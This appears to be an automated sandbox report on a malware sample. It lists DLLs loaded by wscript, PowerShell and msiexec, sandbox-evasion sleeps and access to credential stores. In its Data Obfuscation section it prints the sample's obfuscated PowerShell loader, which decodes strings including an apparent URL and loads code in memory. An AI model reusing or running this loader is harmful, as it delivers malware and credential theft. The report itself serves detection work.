              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\<.oeaccountC#z source: msiexec.exe, 0000000D.00000002.2629663448.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627803746.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627748759.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdbq source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: msiexec.exe, 0000000D.00000002.2629463752.0000000002A4A000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("Powershell.exe", "" <#Gearstngers Checkoffs Unappealingly", "", "", "0");
              Source: Yara match File source: 00000004.00000002.2508605979.0000000009345000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2508157288.00000000080C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2486668247.000000000552C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Waukit)$gloBal:BOgsamleRe42 = [systEM.Text.ENcoDIng]::ascII.GEtstRiNg($smELTEosTE)$glObal:dIssimILErEndE=$BogsAmlERe42.sUbsTrIng($FluKiLY135,$DekoDeRe)<#Waddles Prolongering Learnabl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((diskettebger $Trykkefrihedens $Singularissen), (Flamlnders @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:converges = [AppDomain]::CurrentDomain.GetAssemb
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Soddened13)), $Cirkelbevisets).DefineDynamicModule($cueing, $false).DefineType($Cellepora, $Riitta, [System.MulticastDelegate])$Indfds
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Waukit)$gloBal:BOgsamleRe42 = [systEM.Text.ENcoDIng]::ascII.GEtstRiNg($smELTEosTE)$glObal:dIssimILErEndE=$BogsAmlERe42.sUbsTrIng($FluKiLY135,$DekoDeRe)<#Waddles Prolongering Learnabl
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. 
Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (command line identical to the preceding entry)
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345079C5 push ebp; ret 2_2_00007FFD345079C8
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22331219 push esp; iretd 7_2_2233121A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22322806 push ecx; ret 7_2_22322819
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044693D push ecx; ret 10_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00451D54 push eax; ret 10_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00451D34 push eax; ret 13_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00444E71 push ecx; ret 13_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00414060 push eax; ret 14_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00414060 push eax; ret 14_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00414039 push ecx; ret 14_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_004047CB
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4909
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4961
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6094
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3758
              Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 9.2 %
              Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.2 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2244 Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3004 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568 Thread sleep count: 7445 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568 Thread sleep time: -22335000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568 Thread sleep count: 2540 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568 Thread sleep time: -7620000s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_223210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_223210F1
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22326580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,7_2_22326580
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
              Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: bhvF097.tmp.10.dr | Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
